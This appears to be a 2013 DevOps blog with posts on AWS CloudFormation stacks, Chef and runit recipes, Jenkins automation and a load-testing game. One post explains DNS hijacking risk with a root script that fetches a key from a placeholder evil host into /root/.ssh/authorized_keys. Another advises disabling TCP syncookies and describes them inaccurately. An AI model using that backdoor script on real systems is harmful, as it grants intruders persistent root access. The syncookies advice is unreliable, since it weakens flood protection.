Wednesday, November 20, 2013

Gut check

Let's do a quick gut check on where we are in the evolution of our information technology.

First we start with this math problem:
http://en.wikipedia.org/wiki/Wheat_and_chessboard_problem

Now we look at Moore's law:
http://en.wikipedia.org/wiki/Moore's_law

In the abstract Moore's law is stating that the capacity of our compute resources doubles every 18 months, but let's extend that to say that the pace of technology adoption and our overall use of technology doubles in that same period.

If we start at the epoch of Jan 1, 1970 and count the number of 18 month periods we would have 28.6 periods, so let's round this up to 29.

This puts us here:
1,073,741,823
http://www.wolframalpha.com/input/?i=%5Csum_%7Bi%3D0%7D%5E%7B29%7D+2%5Ei.%5C%2C+

Let's put this number in context, the last iteration, 28 was this number ( exactly half, of course ):
536,870,911

The next iteration will be ( exactly double, of course ):
2,147,483,647

These are some pretty huge numbers, in this model we can put numbers behind how fast things are about to start moving.  Look around you and watch how toddlers are running iPad's and learning how to adapt to the technology that the older generation is simply unequipped to deal with.

If this model is accurate, then the pace of technology is going to accelerate to a point where each successive cycle is going to double the velocity of the pace, which will accelerate everything even more.

This is a very exciting time to be alive!

Embedded stacks

The theater:
https://github.com/krogebry/pentecost/blob/master/templates/theater.json

This is what I refer to as the "root" template were we setup all of our core params and start building sub-stacks.

The first subnet, known as the Ops or OpsAuto subnet is created with this chunk:

"OpsAutoSubnet": {      "Type": "AWS::CloudFormation::Stack",      "Properties": {        "TemplateURL": "https://s3-us-west-2.amazonaws.com/cloudrim/core/subnet-opsauto.json",        "Parameters": {          "VPCId": { "Ref": "VPC" },          "CidrBlock": { "Fn::FindInMap": [ "SubnetConfig", "OpsAuto", "CIDR" ]},          "AvailabilityZone": "us-east-1b",          "InternetGatewayId": { "Ref": "InternetGateway" }        }      }    } 
The source for this can be found here:
https://github.com/krogebry/pentecost/blob/master/templates/core/subnet-opsauto.json
As you can see, the subnet-opsauto.json stack template is creating a subnet within the main VPC, then attaching ACL entries and a security group.
This is very handy for being able to encapsulate all of your security rules in once place for a given software package.
Now let's take a look at a generic subnet:
https://github.com/krogebry/pentecost/blob/master/templates/core/subnet-primary.json
I'll eventually get around to cleaning thing so it's more abstract and versatile.  The idea here is that we create a generic pattern for how we expect all of our applications to function.  At the moment I haven't defined any specific ACL's or security groups, so traffic will not be able to flow from one network to the next.
There are two ways of approaching this:
  1. Create a custom subnet definition for each application stack which defines the ACL's and security groups.
  2. Define the same groups in the root template by using Fn::GetAtt to reach into the stack and pull out the Output variables.
Either approach is fine, it's up to you to decide which method is going to be better for the long-term health of your organization.
In either case, CI/CD is still a valid possibility.
One final thought on this subject: Huge thanks to the CloudFormation team for being totally awesome!

Embedded CloudFormation: using stacks in a non-compiled context

First off, I want to define the two ways in which I've learned to create CloudFormation templates:

  1. Compiled: this method uses a client/server model that very much looks like the chef-client/chef-server model.  In this method small chunks of JSON are used to kick off a template build.  This template build process creates a large template file from many component parts.
  2. Embedded: this process uses no pre-compile magic, but instead uses a "root" template to kick off n-number of sub-stacks using the AWS::Stack template resource.
Now let's define a use case that can help better illuminate the situation.  I'm going to use my favorite project of all times for this: CloudRim!

CloudRim has a fairly standard layout:
  1. Contained in a VPC with 3 subnets:
    1. Ops ( 10.0.0.0/16 - us-east-1b ): This is where the chef server, proxy, and jenkins slaves live, this is also the "jump box" also known as the "threshold box."
    2. Primary ( 10.0.1.0/16 - us-east-1b ): This is where the primary, production application will run
    3. Secondary ( 10.0.2.0/16 - us-east-1e ): This is where we put our HA backup for this region.
  2. The application itself is a node.js application that utilizes multiple instances, each instance on it's own port, all ports are tied together with ASG's, ELB's, and finally Route53.
  3. The data storage layer is a sharded MongoDB database where the mongos bits are running on the application servers.
  4. Everything is configured with chef.
When we use the compiled version we'll end up with a group of stacks that looks like this:
  1. VPC
  2. OpsAuto
  3. Application-A
  4. Application-B
  5. MongoDB-A
  6. MongoDB-B ( repl set )
When using the embedded approach we get a slightly different layout:
  1. Root
    1. VPC Subnet Ops
    2. VPC Subnet Primary
    3. VPC Subnet Secondary
    4. Application-A
    5. Application-B
    6. MongoDB-A
    7. MongoDB-B ( repl set )
They look basically the same, however, one of the advantages that comes with using the embedded approach is that everything can be removed by removing the Root stack.  Obviously that could be a bad thing as well, depending on the use case.

Some people might be tempted to state that the repl set should be handled in a different stack, and I'm inclined to agree with that statement.  However, for the purpose of this document we'll stick with this layout so we can keep everything together in one logical construct.

The embedded approach is very compelling, however, there is one aspect of this that happens to be a significant drawback: troubleshooting.

The embedded approach is what's known as a "derived" approach, which is to say that you have to think of every single element as an abstract idea.  This is very difficult for those that are just starting out with the technology as it forces you to have to visualize how things are going to play out, but never actually seeing the final, compiled version of the template.  Troubleshooting in this environment is very difficult, even for a seasoned veteran like myself.

In contrast, the compiled approach is specifically targeted at avoiding this problem.  The compiled approach is much easier to debug, maintain, and supports a much faster iteration cycle.  Templates are used to make things faster and more agile, however, the draw back to this speed is that it requires a compile layer ( client / server ) in order to actually work.

Either solution can be integrated into a CI/CD system, and both systems have an equal pro/con list.  Choosing which method you go with really comes down to how much work you're willing to do in the long run.

The embedded version requires a deep knowledge of AWS and specifically how CloudFormation works.  However, the compiled version requires running a client/server service that looks and acts much like chef.

If your team(s) are familiar with AWS and have a basic understanding of CF, then the embedded approach does make more sense.  However, for larger, more complex scenarios where many business groups are going to be using this system, a more modular approach with the compiled method could save time and headache in the long run.

Ping me for code snippets.

Saturday, November 9, 2013

More CF Automation Awesomeness

Everything just got condensed to this:

    "DragonGroup": {
      "Name": "HTC::OpsAuto::Plugin::ELBServiceGroup",
      "Type": "HTC::Plugin",
      "Properties": {
        "PortStart": 9000,
        "NumberOfPorts": 3,
        "DNSName": "cloudrim",
        "Weights": [ "40","30","30" ],
        "SecurityGroupName": "LoadBalancerSecurityGroup"
      }
    },

and this:

    "NumServicePorts": {
      "Type": "String",
      "Description": "Number of service instance ports"
    }


and this:

    "ConfigASG": {
      "Type": "AWS::AutoScaling::AutoScalingGroup",
      "Properties": {
        "Tags": [{ "Key": "DeploymentName", "Value": { "Ref": "DeploymentName" }, "PropagateAtLaunch": "true" }],
        "MinSize": { "Ref": "Min" },
        "MaxSize": { "Ref": "Max" },
        "DesiredCapacity": { "Ref": "DesiredCapacity" },
        "AvailabilityZones": [{ "Ref": "AvailabilityZone" }],
        "VPCZoneIdentifier": [{ "Ref": "PrivateSubnetId" }],
        "LoadBalancerNames": { "HTC::GetVar": "elb_names" },
        "LaunchConfigurationName": { "Ref": "ServiceLaunchConfig" }
      }
I wrote the "HTC::GetVar" chunk so I can create variable data in plugins and pass them back to the stack.  Best part about this is that the variables persist on the object!  Thanks Mongo!

Running single-threaded applications like a boss using CloudFormation and Chef.

NodeJS + CF + Chef = Unicorn Awesomeness!!

The problem statement is this: how do I make use of a single-threaded application in the cloud?  This is great practice for technologies like redis where there is a specific focus on accomplishing a very direct, targeted objective in a "weird" kind of way.  Redis is also single-threaded, but it's focus is on really really fast indexing of structured data.  In the case of Node it makes sense to run many instances of the run time on a single compute resources, thus using more of the systems resources to get more work done.

I'm using a formula of n+1 where n is the number of ECPU's.  An m1.large instance in AWS has 2 ECPU's.  The goal here is to find an automated path to running the cloudrim-api on many ports for a single compute instance.  Then load balancing the incoming requests across an array of ELB's, each ELB attached to a separate port, but the same group of nodes.  Also maintaining that all traffic coming into any given ELB group is always port 9000.

High-level summary

This is creating several AWS objects:

  • Security group for the load balancer which says "only allow traffic in from port 9000".
  • 2 Elastic Load Balancer objects, both of which listen on port 9000, but direct traffic to either 9000, or 9001 on the target.
  • Each ELB has it's own DNS Alias record.
  • A regional DNS entry is created in a way that Route53 will create a weighted set for each entry in the resource collection. 
The magic is in the last step, what we end up with is an end point cloudrim.us-east-1.opsautohtc.net which points at a weighted set of ELB's.  Each ELB is pointing to a specific port on a collection of nodes, this collection of nodes is the same for each ELB, but different ports.

This allows us to run many instances of a software package in a dynamic way ( more ECPU's will grow most of the system automatically ).  I'm combining this with runit for extra durability; runit ensures that the process is always running, so if the service crashes, runit will automatically create a new instance almost immediately.


CloudFormation bits:

    "LoadBalancerSecurityGroup": {
      "Type": "AWS::EC2::SecurityGroup",
      "Properties": {
        "VpcId": { "Ref": "VpcId" },
        "GroupDescription": "Enable HTTP access on port 9080",
        "SecurityGroupIngress": [
          { "IpProtocol": "tcp", "FromPort": "9000", "ToPort": "9000", "CidrIp": "0.0.0.0/0" }
        ],
        "SecurityGroupEgress": [ ]
      }
    },
    "ElasticLoadBalancer0": {
      "Type": "AWS::ElasticLoadBalancing::LoadBalancer",
      "Properties": {
        "Subnets": [{ "Ref": "PrivateSubnetId" }],
        "Scheme": "internal",
        "Listeners": [{ "LoadBalancerPort": "9000", "InstancePort": "9000", "Protocol": "TCP" }],
        "HealthCheck": {
          "Target": "TCP:9000",
          "Timeout": "2",
          "Interval": "20",
          "HealthyThreshold": "3",
          "UnhealthyThreshold": "5"
        },
        "SecurityGroups": [{ "Ref": "LoadBalancerSecurityGroup" }]
      }
    },
    "ElasticLoadBalancer1": {
      "Type": "AWS::ElasticLoadBalancing::LoadBalancer",
      "Properties": {
        "Subnets": [{ "Ref": "PrivateSubnetId" }],
        "Scheme": "internal",
        "Listeners": [{ "LoadBalancerPort": "9000", "InstancePort": "9001", "Protocol": "TCP" }],
        "HealthCheck": {
          "Target": "TCP:9001",
          "Timeout": "2",
          "Interval": "20",
          "HealthyThreshold": "3",
          "UnhealthyThreshold": "5"
        },
        "SecurityGroups": [{ "Ref": "LoadBalancerSecurityGroup" }]
      }
    },
    "DNSEntry0": {
      "Type": "AWS::Route53::RecordSetGroup",
      "Properties": {
        "HostedZoneName": { "Fn::Join": [ "", [{ "Ref": "DomainName" },"."]]},
        "Comment": "DNS CName for the master redis ELB",
        "RecordSets": [{
          "Name": { "Fn::Join": [ "", [
            "cloudrim0.",
            { "Ref": "StackName" }, ".",
            { "Ref": "DeploymentName" }, ".",
            { "Ref": "AWS::Region" }, ".",
            { "Ref": "DomainName" }, "."
          ]]},
          "Type": "A",
          "AliasTarget": {
            "DNSName": { "Fn::GetAtt": [ "ElasticLoadBalancer0", "DNSName" ] },
            "HostedZoneId": { "Fn::GetAtt": [ "ElasticLoadBalancer0", "CanonicalHostedZoneNameID" ] }
          }
        }]
      }
    },
    "DNSEntry1": {
      "Type": "AWS::Route53::RecordSetGroup",
      "Properties": {
        "HostedZoneName": { "Fn::Join": [ "", [{ "Ref": "DomainName" },"."]]},
        "Comment": "DNS CName for the master redis ELB",
        "RecordSets": [{
          "Name": { "Fn::Join": [ "", [
            "cloudrim1.",
            { "Ref": "StackName" }, ".",
            { "Ref": "DeploymentName" }, ".",
            { "Ref": "AWS::Region" }, ".",
            { "Ref": "DomainName" }, "."
          ]]},
          "Type": "A",
          "AliasTarget": {
            "DNSName": { "Fn::GetAtt": [ "ElasticLoadBalancer1", "DNSName" ] },
            "HostedZoneId": { "Fn::GetAtt": [ "ElasticLoadBalancer1", "CanonicalHostedZoneNameID" ] }
          }
        }]
      }
    },
    "RegionDNSEntry": {
      "Type": "AWS::Route53::RecordSetGroup",
      "Properties": {
        "HostedZoneName": { "Fn::Join": [ "", [{ "Ref": "DomainName" },"."]]},
        "Comment": "DNS CName for the master redis ELB",
        "RecordSets": [{
          "Name": { "Fn::Join": [ "", [
            "cloudrim.",
            { "Ref": "AWS::Region" }, ".",
            { "Ref": "DomainName" }, "."
          ]]},
          "Type": "CNAME",
          "TTL": "900",
          "SetIdentifier": "Array0",
          "Weight": "30",
          "ResourceRecords": [{ "Fn::Join": [ "", [
            "cloudrim0.",
            { "Ref": "StackName" }, ".",
            { "Ref": "DeploymentName" }, ".",
            { "Ref": "AWS::Region" }, ".",
            { "Ref": "DomainName" }
          ]]}]
        },{
          "Name": { "Fn::Join": [ "", [
            "cloudrim.",
            { "Ref": "AWS::Region" }, ".",
            { "Ref": "DomainName" }, "."
          ]]},
          "Type": "CNAME",
          "TTL": "900",
          "SetIdentifier": "Array1",
          "Weight": "40",
          "ResourceRecords": [{ "Fn::Join": [ "", [
            "cloudrim1.",
            { "Ref": "StackName" }, ".",
            { "Ref": "DeploymentName" }, ".",
            { "Ref": "AWS::Region" }, ".",
            { "Ref": "DomainName" }
          ]]}]
        },{
          "Name": { "Fn::Join": [ "", [
            "cloudrim.",
            { "Ref": "AWS::Region" }, ".",
            { "Ref": "DomainName" }, "."
          ]]},
          "Type": "CNAME",
          "TTL": "900",
          "SetIdentifier": "Array2",
          "Weight": "30",
          "ResourceRecords": [{ "Fn::Join": [ "", [
            "cloudrim2.",
            { "Ref": "StackName" }, ".",
            { "Ref": "DeploymentName" }, ".",
            { "Ref": "AWS::Region" }, ".",
            { "Ref": "DomainName" }
          ]]}]
        }]
      }
    },
    "ConfigASG": {
      "Type": "AWS::AutoScaling::AutoScalingGroup",
      "Properties": {
        "Tags": [{ "Key": "DeploymentName", "Value": { "Ref": "DeploymentName" }, "PropagateAtLaunch": "true" }],
        "MinSize": { "Ref": "Min" },
        "MaxSize": { "Ref": "Max" },
        "DesiredCapacity": { "Ref": "DesiredCapacity" },
        "AvailabilityZones": [{ "Ref": "AvailabilityZone" }],
        "VPCZoneIdentifier": [{ "Ref": "PrivateSubnetId" }],
        "LoadBalancerNames": [
          { "Ref": "ElasticLoadBalancer0" },
          { "Ref": "ElasticLoadBalancer1" },
          { "Ref": "ElasticLoadBalancer2" }
        ],
        "LaunchConfigurationName": { "Ref": "ServiceLaunchConfig" }
      }
    }

And now the chef bits:

services = node["htc"]["services"] || [ "api" ]
Chef::Log.info( "SERVICES: %s" % services.inspect )
num_procs = `cat /proc/cpuinfo |grep processor|wc -l`.to_i + 1
Chef::Log.info( "NumProcs: %i" % num_procs )
num_procs.times do |pid|
  Chef::Log.info( "PID: %i" % (9000+pid) )
  runit_service "cloudrim-api%i" % pid do
    action [ :enable, :start ]
    options({ :port => (9000+pid) })
    template_name "cloudrim-api"
    log_template_name "cloudrim-api"
  end
end

Template:

cat templates/default/sv-cloudrim-api-run.erb
#!/bin/sh
exec 2>&1
PORT=<%= @options[:port] %> exec chpst -uec2-user node /home/ec2-user/cloudrim/node.js

Monday, November 4, 2013

Chef and Jenkins

I create chef bits that create jenkins build jobs.  This way I can "create the thing that creates the things."  I can reset the state of things by rm -rf *-config.xml jobs/* on the jenkins server, restart jenkins, then run chef-client and everything gets put back together automatically.  This also allows me to change the run jobs in real time, but then reset everything when I'm done.

recipes/jenkins-builder.rb

pipelines = []
dashboards = []

region_name = "us-east-1"
domain_name = "opsautohtc.net"
deployment_name = "Ogashi"
pipelines.push({
  :name => "Launch %s" % deployment_name,
  :num_builds => 3,
  :description => "

Prism

  • Cloud: AWS
  • Region: us-east-1
  • Account: HTC CS DEV
  • Owner: Bryan Kroger ( bryan_kroger@htc.com )
",
  :refresh_freq => 3,
  :first_job_name => "CloudFormation.%s.%s.%s" % [deployment_name, region_name, domain_name],
  :build_view_title => "Launch %s" % deployment_name
})
cloudrim_battle_theater deployment_name do
  action :jenkins_cloud_formation
  az_name "us-east-1b"
  git_url "git@gitlab.dev.sea1.csh.tc:operations/deployments.git"
  region_name region_name
  domain_name domain_name
end
cloudrim_battle_theater deployment_name  do
  action :jenkins_exec_helpers
  az_name "us-east-1b"
  git_url "git@gitlab.dev.sea1.csh.tc:operations/deployments.git"
  region_name region_name
  domain_name domain_name
end
dashboards.push({ :name => deployment_name, :region_name => "us-east-1" })

template "/var/lib/jenkins/jenkins-data/config.xml" do
  owner "jenkins"
  group "jenkins"
  source "jenkins/config.xml.erb"
  #notifies :reload, "service[jenkins]"
  variables({ :pipelines => pipelines, :dashboards => dashboards })
end



cloudrim/providers/battle_theater.rb:

def action_jenkins_exec_helpers()
  region_name = new_resource.region_name
  domain_name = new_resource.domain_name
  deployment_name = new_resource.name

  proxy_url = "http://ops.prism.%s.int.%s:3128" % [region_name, domain_name]

  proxy = "HTTP_PROXY='%s' http_proxy='%s' HTTPS_PROXY='%s' https_proxy='%s'" % [proxy_url, proxy_url, proxy_url, proxy_url]

  job_name = "ExecHelper.chef-client.%s.%s.%s" % [deployment_name, region_name, domain_name]
  job_config = ::File.join(node[:jenkins][:server][:data_dir], "#{job_name}-config.xml")
  jenkins_job job_name do
    action :nothing
    config job_config
  end
  template job_config do
    owner "jenkins"
    group "jenkins"
    source "jenkins/htc_pssh_cmd.xml.erb"
    cookbook "opsauto"
    variables({
      #:cmd => "%s sudo chef-client -j /etc/chef/dna.json" % proxy, 
      :cmd => "%s sudo chef-client" % proxy,
      :hostname => "ops.prism",
      :domain_name => domain_name,
      :region_name => region_name,
      :deployment_name => deployment_name
    })
    notifies :update, resources(:jenkins_job => job_name), :immediately
  end

 [...]

end


Sunday, November 3, 2013

Great run...

We had a great first run of the BattleTheater today.  Release 0.0.9 fixes a ton of bugs relating to the engines.

I have found an absolutely brilliant way of running the nodejs services.  I have this in my services.rb recipe:

runit_service "cloudrim-kaiju" do
  log false
  if(services.include?( "kaiju" ))
    action [ :enable, :start ]
  else
    action [ :disable, :down, :stop ]
  end
end

I can run a variable number of nodejs services based on the contents of the node["htc"]["services"] array.

These runit services are templated, but basically I can run a service that does this:

node /home/ec2-user/cloudrim/engines/kaiju.js

And run the Kaiju Engine on it's own thread.  Runit takes care of making sure the service is always running, and I don't have to mess with init scripts!!

Thank you #opscode !

How do I CloudRim?

Do something like this:

curl -XPOST -H "Content-Type: application/ajax" -d '{"email":"your.emil@blah.com"}' Tanaki-cl-ElasticL-10851AT1WINID-1417527178.us-east-1.elb.amazonaws.com:9000/hq/battle

You'll get this back:

{"kaiju":{"hp":90.71948742261156,"xp":0,"str":7,"name":"Knifehead92","level":14,"armor":7,"speed":7,"bonuses":{"ice":0,"fire":0,"earth":0,"water":6},"category":3,"actor_type":"kaiju","_id":"5276b4d902b6008c0e00007d"},"jaeger":{"level":33,"_id":"5276b4d94a2ad64d0e00007a","hp":100,"name":"","weapons":{"left":{"ice":0,"fire":1,"earth":9,"water":0},"right":{"ice":5,"fire":9,"earth":1,"water":0}}}}


Friday, November 1, 2013

CloudRim

GitRepo

CloudRiim is a little game I came up with to help people understand high-volume load and scaling techniques in AWS.

The idea here is that I launch a "Battle Theater" into an AWS region, let's say us-east-1 for example.  The BT is basically a MongoDB sharding rig with automatic sharding in place.  When the battle begins I will announce "The Kaiju have landed in USEast!!" and the battle will begin.

Most games are centered around the idea of keeping people off the server and doing as much local caching as possible.  This is not that by a good long shot.  The idea of this game is to pound the absolute shit out of the server as hard and as fast as you can.  In fact, simply using ab or a script with some treading junk won't be enough.  Even running jmeter on a single box won't be enough.

The goal of this game is to destroy all Kaiju in existence, but the Rift keeps spawning new Kaiju at a fairly high rate.  The Jaegers are also spawned at a similar rate.

There are two winning scenarios in the game: either the Kaiju win and you suck, or the Apocalypse is canceled and the hero's win.

Every time you do battle with the server you are awarded a random number of XP between 1 and 10, so in order to be at the top of the charts you have to do as many battles as possible.

Now here's the catch, this entire game is built around this idea that great automation can do amazing things.  In order to prove this the BT is only deployed for an hour.  This means that you have less than an hour to spin up your nodes and attack the server as hard and as fast you possibly can.  Obviously this is going to require coordination on your part.

At the end of the game the scores are tallied up and the person at the top of the score chart is given the metal of honor or something.

The idea here is to give people a fun, engaging way of learning how automation works and why it's important.  It's also a great way to prove just how unbelievably awesome AWS really is.

Monday, October 7, 2013

DNS hacking paranoia

Every time I see a story like this, I freak out a little:

http://thehackernews.com/2013/10/worlds-largest-web-hosting-company_5.html

Long story short: DNS hijacking.

When we look at the cloud offering landscape we see cloud providers like Amazon, RackSpace, and Google, but there are also cloud management companies like RightScale and Scalr.  These cloud management companies will sometimes lay in their own custom software bits that help aid in the configuration and management of a given compute resources.

In most cases ( and we can even include things like chef servers here as well ) the compute resource that is being managed will make a call out to the "control server" for instructions.  But how does it know which server to contact?  That's where DNS comes in, for example:

configuration.us-east-1.mycompany.com

Would be a DNS entry that actually points to:

cf-chef-01.stackName0.deploymentName0.regionName.domainName.TLD

The DNS eventually points to an IP, and the client makes the call.

If an attacker is able to hyjack mycompany.com, they could point configuration.us-east-1 at their own IP address.  Most of these configuration management applications use some kind of authentication or validation to prove they are who they are.  In the case of chef, the calls are wrapped in encrypted payloads that can only be decrypted by a key on the server side, which makes "man in the middle" attacks much more difficult.

In some cases the configuration management software simply makes a call to a worker queue which uses a basic username/password system.  In this case one could simply wrap any type of generic worker queue with a "always pass authentication" switch that would always allow the client to successfully authenticate.  This would allow you to control the client by simply injecting worker elements into the queue.

For example, we could create a worker element that runs the following script as root:

#!/bin/bash
curl -o /tmp/tmp.cache.r1234 http://my.evil.domain.com/public_key
cat  /tmp/tmp.cache.r1234 >> /root/.ssh/authorized_keys

This would work great for any node that isn't in an VPC and is attached to a public IP.  Other tickery could be used to extend the evilness of this hack, but the point is that if you can execute something on the remote box as root, you're pretty well fucked.

This is why DNS hijacking stories scare me a little.

Friday, October 4, 2013

tcp syn flooding ... why does this keep happening?

Linux itself is just a kernel, all of the crap around the kernel, from bash, to KDE is considered part of the distro.  Linux distros come in many flavors, shapes and sizes.  This is benificial to everyone as it allows for a few generic "types" of distros that can then specialize with further customizations.    For example, Ubuntu is derived from the Debian base type.  Similarly CentOS is derived from Red Hat Enterprise Linux.

The differences between CentOS and RHEL are mostly related to licensing and support.  Red Hat the company publishes, maintains and supports the Red Hat Enterprise Linux ( RHEL ) distribution.  Their product isn't Linux, it's actually supporting and maintaining the distribution around Linux.  CentOS is not a product, it's maintained by the community according to their perfectly adequate community standards.

Amazon also makes it's own AMI.  There AMI is specifically designed to work in their EC2 environment.  The expectation is that this AMI will be used in a high traffic environment.

When having a discussion about which distribution to go with it's important to pay attention to the expectations of use.  These expectations aren't always as obvious as the expectations around the Amazon AMI.  Amazon is making it's expectations very clear:

"the instance that you use with this AMI will take significant amounts of traffic from one or may sources"

This expectation is set by the engineers that were paid large sums of money to ensure that these expectations are reflected in every decision made by the maintainers of the Amazon AMI.  Amazon pinned their reputation on this AMI and they use it in their own production environments, that tells me quite a bit about what went into making this distro happen.  They also support it as part of an enterprise support contract.  All of these facts make the Amazon AMI a very solid choice for cloud operations.

Other distros, like CentOS are a far less clear on their expectations.  For instance, CentOS seems to live in many worlds with no clear, specific role or specialization.  However, certain choices made by the maintainer can give us an general idea of what the intent might be.

For example, if a distro made a choice to, by default, protect the system from a type of attack known as a "syn flood" you would see the following:

cat /proc/sys/net/ipv4/tcp_syncookies
1

This means that tcp_syncookies is enabled.  This is a setting which says "don't allow too many people from a single IP address flood this computer."

This is great for desktops, but it's directly in contrast to how servers are supposed to work.  This is exactly opposite of what you want in a high-volume environment.

It's a very easy fix, and in our case, all I had to do is add a single line to the startup scrip for the service nodes.

          "echo 0 > /proc/sys/net/ipv4/tcp_syncookies\n",

Easy peasy.

Here's what you would see in EC2 if you were using an ELB:

  1. Instances are fine, everything is in "In Service" state. 
  2. You run ab -n 10000 -c 500 http://your_host/hb
  3. About half way through the test the ELB goes nuts, all of the instances are in "Out of Service" state.
  4. The application is fine, but the operating system seems to be completely offline from the perspective of the load balancer, but you can ssh into the instance, and telnet works fine.
What's happening is that the box is basically being DDOS'd from the haproxy's that run as the ELB.  This type of mitigation is only useful on desktops because this is usually handled by other points upstream when in the cloud or any kind of professionally built data center environment.

I remember writing about this many years ago while working at Deep Rock Drive, I'm just astonished that we still see this today in professional environments.



Sunday, September 29, 2013

Chef snippet: Creating a self-signed cert


Use this snippet to create a self-signed certificate in a few lines of chef:
server_ssl_req = "/C=US/ST=Several/L=Locality/O=Example/OU=Operations/CN=#{node[:fqdn]}/emailAddress=root@#{node[:fqdn]}"
execute "Create SSL Certs" do
  command "openssl req -subj \"#{server_ssl_req}\" -new -nodes -x509 -out /etc/nginx/cert.pem -keyout /etc/nginx/key.pem"
  only_if(!File.exists?( "/etc/nginx/cert.pem" ).to_s)
end

Saturday, September 28, 2013

Automation in the cloud

Automation and the cloud

Far too often I've worked for companies that are using the cloud incorrectly.  It wasn't until recently that a college put it perfectly when he said "we use the cloud like it's just another data center."  I couldn't have put it better myself.

When we talk about this "cloud" stuff we're talking about a fundamental shift in thinking and expectations.   I see this shift in much the same was as the change in expectations between the first time I went to ESPN and going to ESPN now.  About 10 years ago sites were flat, things were relatively easy and sites were not all that complicated.  Take a look at any property out there what you get isn't a web page, it's an immersive experience tailored to your advertising profile.

We typically refer to this shift in expectations as "Web 2.0."  Many years from now someone will make a documentary of sorts that tells the tale of the cloud story.  In that story the word DevOps will be used to define the change in expectations that we're going through now.  At the beginning of the story we have the traditional Linux/Unix engineers, or as I like to call them "bare metal folks."  At the end of the story we have the DevOps engineers, or "cloud people" like me.

In my travels I have found that the traditional folks are generally more conservative, and thus an incredible value to me as a balance to my inventor energy.  In most cases these minds forget that when moving into the cloud the change in expectations is absolutely vital for being successful in the cloud.

If you really do want to make this work there are a few basic ideas that you have to come to grips with.

Nodes are replaceable 

The idea of web000.blah.us-west-1.aws.mydomain.tld is bad.  What you're used to is an environment where a wiki page ( or similar documentation ) details each node, it's role, it's static IP assignment and other bits of information.  In the cloud world this doesn't exist.

This is one of the reasons why people like me are constantly banging the automation drum.  If a node has an issue in production, you simply trash it.  There is the rare edge case where you might have to take a box out of rotation for investigation, RCA, whatever, but that node should never have a path back into production.  Once it's out, it will never take production traffic again.

This is a significant hurdle for most people to get over, because it means that you have to trust the state of your environment to something like chef, puppet, ansibleworks.com or salt.  In any case trusting that something else is going to be able to do this work is difficult.

Cloud people don't struggle with this as much since we start with a configuration management tool and work from there.  If we know our automation works, then we know we can solve problems by simply trashing anything that appears broken.

Automate as much as you can

My mantra is "If it can't be automated, it shouldn't exist."  That's a pretty lofty goal for sure, but we use this as a target, and it's okay if we don't hit the target every time.  We allow for exceptions and focus our documentation efforts on those exceptions.  Everything else we try to automate as much as we can.

+Brian Aker said recently in his keynote at LinuxCon/CloudOpen North America that they removed SSH from production.

Think about how this would work as a design philosophy.  You start with the idea that you will have absolutely no access to a production resource, and no way to enable SSH at any point after it's deployed.

This would require that you have everything correct up to production, or in other words, your testing and automation, and automated testing is so locked down that you are absolutely confident that everything will work in production.

This is the fundamental lesson to be learned from cloud computing.  It's not just a bunch of virtualization and "wasted cycles" it's an enforcement engine for proper design.  If you can honestly say that you can safely remove SSH from all of your production bare metal resources and be perfectly fine with doing that, then you win.  However, I know for a fact that the vast majority of data center operations would not work without SSH.

Good automation makes the cloud work.  Remember, every time to solve a problem with a bash script a unicorn dies.  Do your part to stop unicorn genocide and ban bash from your configuration management solution.

Virtualization doesn't suck

Let me clarify here: virtualization on the macro level does eat cycles to everything from memory usage to network IO.  We're all well aware of this, we call it a cost, it's something you pay for to get something else.  The cost buys us something that most of the bare metal people forget about: an API.

I can create 50 nodes that do something neat with a single command.  You require six months of debate, committees, and purchase order red-tape to get new hardware.  Once the hardware arrives you also eat the cost of racking everything, tracking the assets used in whatever horrible abomination tracks those bits, then, finally ( in most cases ) there is a semi-automated process to get the instance up.

After everything is said and done you've spend an enormous amount of time, energy and money on something you could have done in five minutes for much cheaper.

Adding capacity to a site is an example of such a use case.

I've always believed that the capacity of a single piece of hardware will never be able to compare to what can be done with many smaller things.  If you need an actual use case for how this works take a look at how Amazon does ELB.  Many virtualized haproxy nodes, not one giant piece of hardware.  Heat ( part of OpenStack ) has a similar type of functionality that looks like ELB and just spins up haproxy nodes.

Summary

I predict that we're going to start seeing an imbalance of sorts when it comes to IT jobs.  The bare metal folks will gravitate towards the few remaining companies that either specialize in a tailored "private cloud" experience ( like Blue Box Group or RackSpace ) or can justify running their own datacenters ( Facebook or Twitter being the obvious examples ).

In either case the pool of available jobs will decrease and employers will require more and more specialization in new hires.  The sector will become a niche offering and eventually suffer from a dire lack of available, qualified people.

While this is happening, the cloud people will continue to accelerate on the cloud platforms and eventually reach the critical mass at which point we will have fully transitioned our expectations from "old and broken ESPN" to "rich and engaging ESPN."  At which point I will eat cake.




Cloud formation and VPC's

CloudFormation with VPC's and VPN's.

Hardware VPN connections from our datacenter to our end points in the cloud.
VPC's are used on the cloud side because VPC's are awesome.

Everything is connected together such that we have a single VPC and multiple subnets that can all route on the VPN back to the bare metal resources.

I use tags on the VPC, Subnet, and NetworkACL objects to determine which resource to connect to.

What would be nice is a way to reference an existing resource by a search query objects.

For example:

{
  "Resources": {
    "ExistingVPC": {
      "Type": "AWS::EC2::VPC",
      "Search": {
        "Dimension": { "Tag": "primary" }
      }
    }
  }
}

I'm leaving quite a bit out here, but the basic idea is to have a search query to find an existing object.  Additionally you could also include the ability to include the "Properties" hash as a series of overrides.